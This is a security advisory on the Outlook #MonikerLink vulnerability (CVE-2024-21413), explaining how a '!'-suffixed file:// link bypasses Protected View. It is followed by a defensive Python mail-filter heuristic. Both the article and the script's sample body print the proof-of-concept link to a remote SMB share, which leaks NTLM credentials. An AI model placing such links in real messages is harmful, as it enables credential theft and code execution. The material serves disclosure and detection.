Outlook has been found to contain an interesting vulnerability in the way it handles certain hyperlinks, one that has been exploited by threat actors in the wild. The vulnerability has been assigned CVE-2024-21413 and carries a CVSS severity score of 9.8 (Critical).
Microsoft has addressed the vulnerability and fixed it as part of its February 2024 Patch Tuesday release. Successful exploitation allows a threat actor to bypass Office Protected View and open a file in editing mode instead of protected mode.
Outlook 0-day RCE Flaw
According to the Check Point report, if a link begins with http:// or https://, Outlook uses the Windows default browser to open the URL. For other registered protocols, such as the "skype" URL protocol, clicking the link displays a security warning.
In other cases, such as the "file://" protocol, Outlook did not display a warning dialog at all. Instead, an error message appeared in the Windows Notification Center, and the resource the link pointed to was not accessed.
Had the resource been accessed, there is a high likelihood that the user's local NTLM credential information would have been leaked to the remote host.
The #MonikerLink Bug
A slight modification of the "file://" link bypasses the security restriction shown above, and Outlook proceeds to access the resource. For testing purposes, the link below was used; it successfully accessed the "test.rtf" file on the remote share.
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
As the researchers state, accessing this resource uses the SMB protocol, which leaks the local NTLM credential information in the process. The researchers then went further and escalated this attack vector to arbitrary code execution.
A Moniker Link is a string used to look up COM (Component Object Model) objects on Windows; Outlook calls the ole32!MkParseDisplayName() API to do this job. According to Microsoft's API documentation for monikers, including "!" in the string makes it a composite moniker.
Exploitation
The researchers used this composite moniker, a FileMoniker (\\10.10.111.111\test\test.rtf) plus an ItemMoniker (something), to reach Microsoft Word, which Windows runs as a COM server in the background.
When the link is clicked, Word opens and parses the file "test.rtf" referenced by the string "\\10.10.111.111\test\test.rtf". Since test.rtf is controlled by the attacker, it can be crafted to achieve arbitrary code execution on the victim's system inside "WINWORD.EXE".
The researchers note that the #MonikerLink bug/attack vector may also be present in other software and recommend that developers check for and fix the issue.
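As an added illustration of the link shapes discussed in the #MonikerLink and Exploitation sections above (this is editorial example code, not code from the Check Point report or from this article), the following Python snippet classifies the hyperlinks found in an HTML mail body according to the Outlook behaviours described here, and flags the composite-moniker shape: a file:// UNC path followed by "!" and an item name. The sample mail body, the example.com link and the skype: link are constructed for the example; the two UNC links reuse the address and file name from the article's own test link. This is a mail-filter heuristic, not a reproduction of the exploit.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Outcome labels for the hyperlink behaviours described in the article.
BROWSER = "browser"             # http:// or https://: handed to the default browser
WARNING = "protocol-warning"    # any other registered protocol (e.g. skype:): security warning
FILE_BLOCKED = "file-blocked"   # plain file:// link: error in Notification Center, no access
MONIKERLINK = "monikerlink"     # file:// link with "!item": composite moniker, access proceeds

# After normalisation a file target looks like "host/share/path.ext!item".
# The "!" is what MkParseDisplayName treats as the FileMoniker/ItemMoniker split.
UNC_ITEM = re.compile(r"^(?P<host>[^/]+)/(?P<path>[^!]+)!(?P<item>.+)$")


def classify_href(href: str) -> dict:
    """Classify one href by the Outlook behaviour the article describes for its scheme."""
    href = href.strip()
    scheme, sep, rest = href.partition(":")
    if not sep:
        return {"href": href, "kind": "relative"}
    scheme = scheme.lower()
    if scheme in ("http", "https"):
        return {"href": href, "kind": BROWSER}
    if scheme != "file":
        return {"href": href, "kind": WARNING, "scheme": scheme}

    # Normalise the file:// forms so that both "file:///\\host\share\x" and
    # "file://host/share/x" collapse to "host/share/x" before matching.
    target = unquote(rest).replace("\\", "/").lstrip("/")
    m = UNC_ITEM.match(target)
    if m is None:
        return {"href": href, "kind": FILE_BLOCKED, "target": target}
    host = m.group("host")
    return {
        "href": href,
        "kind": MONIKERLINK,
        "host": host,
        "path": m.group("path"),
        "item": m.group("item"),
        # A drive letter ("C:") means a local FileMoniker; anything else is a UNC
        # host, which is the case where SMB is used and NTLM credentials are exposed.
        "remote": not re.fullmatch(r"[A-Za-z]:", host),
    }


class _AnchorCollector(HTMLParser):
    """Collect the href attribute of every <a> tag in an HTML body."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "a":
            return
        for name, value in attrs:
            if name.lower() == "href" and value is not None:
                self.hrefs.append(value)


def scan_html(body: str) -> list:
    """Return a classification record for every anchor in an HTML email body."""
    collector = _AnchorCollector()
    collector.feed(body)
    return [classify_href(h) for h in collector.hrefs]


def monikerlinks(body: str) -> list:
    """Only the records a mail filter should block or quarantine."""
    return [r for r in scan_html(body) if r["kind"] == MONIKERLINK]


# Constructed sample body (assumption): example.com and the skype link are made up;
# the two UNC links reuse the address and file name from the article's test link.
SAMPLE_BODY = r"""
<html><body>
<p>Quarterly report: <a href="https://example.com/report">download</a></p>
<p>Call me: <a href="skype:sales?call">skype</a></p>
<p>Old share: <a href="file:///\\10.10.111.111\test\test.rtf">open</a></p>
<p>New share: <a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a></p>
</body></html>
"""

if __name__ == "__main__":
    for record in scan_html(SAMPLE_BODY):
        print(record["kind"], record["href"])
```

The only thing that separates the blocked link from the flagged one is the "!" after the file path, so a filter that keys on the scheme alone will pass the bypass. Matching on the composite-moniker shape, rather than on a specific host or file name, catches the same trick against any share.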